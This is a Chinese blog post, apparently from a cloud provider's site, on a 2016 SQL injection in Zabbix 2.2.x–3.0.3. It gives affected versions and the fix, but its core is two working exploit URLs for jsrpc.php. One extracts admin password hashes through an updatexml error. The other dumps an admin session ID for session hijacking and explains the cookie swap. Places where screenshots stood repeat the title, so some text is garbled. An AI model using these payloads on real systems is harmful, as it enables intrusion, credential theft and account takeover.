温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

发布时间:2020-04-17 09:36:49 阅读:1192 作者:serverxx0 栏目:安全技术
开发者测试专用服务器限时活动,0元免费领,库存有限,领完即止! 点击查看>>

漏洞来源: http://seclists.org/fulldisclosure/2016/Aug/60

***成本:低

危害程度:

利用条件: 需要guest用户权限(未登录用户都被设定为guest用户的访问权限)

影响范围:2.2.x / 2.4.x/ 3.0.0-3.0.3

修复建议: 禁用guest用户或者升级到3.0.4

漏洞利用:

   爆密码

   sanr.com/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from zabbix.users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

输出结果,如下表示漏洞存在:

  Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

输出结果,如下表示禁用guest:

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

 爆sessionid(在密码破解不了情况下 可以使用session欺骗)

   需要取掉爆出来sessionid前面的数字1,在进行修改zbx_sessionid的值。

   sanr.com/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

zabbix具体版号查看

 2.x版本

    

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

  3.x版本

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

    

亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI

开发者交流群×